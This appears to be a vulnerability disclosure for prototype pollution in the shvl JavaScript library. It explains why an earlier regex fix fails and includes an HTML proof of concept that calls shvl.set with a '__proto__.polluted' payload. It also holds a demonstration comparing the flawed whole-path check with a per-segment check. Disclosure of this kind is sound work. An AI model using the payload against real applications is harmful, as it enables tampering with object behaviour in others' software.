Prototype Pollution in robinvdvleuten/shvl
Reported on
May 30th 2021
✍️ Description
Hi, I've seen a recent prototype pollution report to this library and, during the code review, found out that the applied fix doesn't work at all. The problem lies in the regex used for the fix, as I show below.
🕵️♂️ Proof of Concept
The reported prototype pollution resulted in the addition of the following regex to the source code:
!/^(__proto__|constructor|prototype)$/.test(path)
This prevents anyone from using the exact words __proto__, constructor or prototype as the entire path. But since anyone trying to pollute an attribute has to name the attribute to be polluted, such as __proto__.polluted, the presence of $ in the regex makes this fix fail and leaves shvl still vulnerable to prototype pollution. So the payload from the last report still works as reported; this is my PoC:
<!DOCTYPE html>
<html lang="en">
<head>
<title>poc</title>
<script src="https://unpkg.com/shvl@latest/dist/shvl.umd.js"></script>
</head>
<body>
<script>
quote = {}
o = {}
shvl.set(quote, "__proto__.polluted", "oi");
if (o.polluted)
console.log("is polluted!")
else
console.log("is safe!")
</script>
</body>
</html>
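To make the regex problem concrete, here is an added example (not shvl's own code, and not part of the original report): a constructed dotted-path setter in the style of shvl.set whose path check is pluggable, so the anchored whole-path regex from the first fix can be run side by side with a per-segment check against the report's payload. The names setPath, wholePathIsUnsafe, anySegmentIsUnsafe and compareChecks are assumptions for this example.

```javascript
// Added example (not shvl's own code): a minimal dotted-path setter in the
// style of shvl.set, with the path check made pluggable so the two checks
// can be compared side by side.

const DANGEROUS = /^(__proto__|constructor|prototype)$/;

// Check from the first fix: tests the whole path string, so the `$` anchor
// lets "__proto__.polluted" through (only "__proto__" on its own is rejected).
function wholePathIsUnsafe(path) {
  return DANGEROUS.test(path);
}

// Hardened check: every segment of the path is tested against the same list.
function anySegmentIsUnsafe(path) {
  return path.split(".").some((segment) => DANGEROUS.test(segment));
}

// Constructed setter: walks the dotted path, creating intermediate objects,
// and refuses to write when the supplied check flags the path.
function setPath(obj, path, value, isUnsafe) {
  if (isUnsafe(path)) return false; // refused, nothing written
  const keys = path.split(".");
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    // Reading cur["__proto__"] yields Object.prototype, not undefined,
    // which is exactly how the walk escapes into the shared prototype.
    if (cur[keys[i]] === undefined) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return true;
}

// Runs the report's payload against both checks and records whether an
// unrelated object picked up the property. Object.prototype is restored
// afterwards so the demonstration leaves no trace in the process.
function compareChecks() {
  const results = {};
  const checks = [["wholePath", wholePathIsUnsafe], ["anySegment", anySegmentIsUnsafe]];
  for (const [name, check] of checks) {
    const target = {};
    const bystander = {};
    const written = setPath(target, "__proto__.polluted", "oi", check);
    results[name] = { written, bystanderPolluted: bystander.polluted === "oi" };
    delete Object.prototype.polluted;
  }
  return results;
}

console.log(JSON.stringify(compareChecks(), null, 2));
```

With the whole-path check, the write succeeds and the unrelated bystander object reports polluted; with the per-segment check, the write is refused and nothing leaks. The per-segment form is the shape of fix a reviewer should expect for any dotted-path setter, since the dangerous key can appear at any position in the path, not only as the entire string.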
💥 Impact
The impact of this vulnerability is that this library and everyone that uses it remain vulnerable to prototype pollution, as demonstrated in the last pwn2win 2021 challenge small-talk.
Occurrences
I've already proposed a solution, by the way: https://github.com/robinvdvleuten/shvl/pull/36
They merged my fix; the vulnerability no longer exists.